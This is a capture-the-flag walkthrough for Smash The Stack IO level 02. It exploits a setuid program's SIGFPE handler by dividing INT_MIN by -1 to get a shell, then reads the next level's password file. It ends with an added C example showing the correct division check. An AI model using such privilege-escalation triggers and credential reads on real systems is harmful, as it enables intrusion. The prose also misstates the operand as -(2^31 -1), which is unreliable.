Smash The Stack – Exploit i/o – Level 02

Logging in with the password from Level 01

~$ cd /levels

you will find 2 problems; you can solve either of them

level02
level02.c
level02_alt 
level02_alt.c 

open the source file

/levels$ cat level02.c

you will find the following code

 
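#define _GNU_SOURCE     /* needed for the setresuid() declaration */
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* SIGFPE handler: takes on the binary's effective uid and spawns a shell */
void catcher(int a){
        setresuid(geteuid(),geteuid(),geteuid());
        printf("WIN!\n");
        system("/bin/sh");
        exit(0);
}

int main(int argc, char **argv){
        puts("source code is available in level02.c\n");

        /* exit unless there are exactly two arguments and the divisor parses to non-zero */
        if (argc != 3 || !atoi(argv[2]))
                return 1;
        signal(SIGFPE, catcher);
        /* integer division: the only operation here that can raise SIGFPE */
        return atoi(argv[1]) / atoi(argv[2]);
}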

the program installs a handler for SIGFPE, the signal raised on an arithmetic error like division by zero or subscript out of bounds

you can’t divide by zero, as the code checks argv[2] for a non-zero value

but with a little math you can see that the same error can be generated by dividing -(2^31 -1) by -1

then the rest is easy

/levels$ ./level02 -2147483648 -1

then grab the password

/levels$ cat /home/level3/.pass

it took me some time searching to find out exactly which cases cause the SIGFPE.
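
The check level02.c would need in order to reject every operand pair that traps on integer division, as an added example (not part of the original post or the level's source). The names checked_div, checked_div_args and the div_status values are hypothetical, and x86 Linux with a 32-bit int is assumed.

```c
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* Result codes for checked_div (hypothetical names, not from level02.c). */
enum div_status { DIV_OK = 0, DIV_BY_ZERO = 1, DIV_OVERFLOW = 2 };

/*
 * Divide a by b only when the quotient is representable in an int.
 * On x86 the idiv instruction raises a divide error, which Linux
 * delivers as SIGFPE, for two kinds of operands:
 *   - b == 0
 *   - a == INT_MIN && b == -1 (the quotient does not fit in an int)
 * level02.c rejects only the first case.
 */
enum div_status checked_div(int a, int b, int *quotient)
{
    if (b == 0)
        return DIV_BY_ZERO;
    if (a == INT_MIN && b == -1)
        return DIV_OVERFLOW;
    *quotient = a / b;
    return DIV_OK;
}

/* Parse both operands with atoi(), as level02.c does, then divide safely. */
enum div_status checked_div_args(const char *num, const char *den, int *quotient)
{
    return checked_div(atoi(num), atoi(den), quotient);
}

int main(void)
{
    /* Constructed sample inputs; the third pair is the one used above. */
    const char *cases[][2] = {
        { "10", "2" }, { "7", "0" }, { "-2147483648", "-1" },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        int q = 0;
        enum div_status st = checked_div_args(cases[i][0], cases[i][1], &q);
        printf("%s / %s -> status %d, quotient %d\n",
               cases[i][0], cases[i][1], (int)st, q);
    }
    return 0;
}
```

Status 2 for the third pair means the division was refused before it could trap, so a SIGFPE handler would never run.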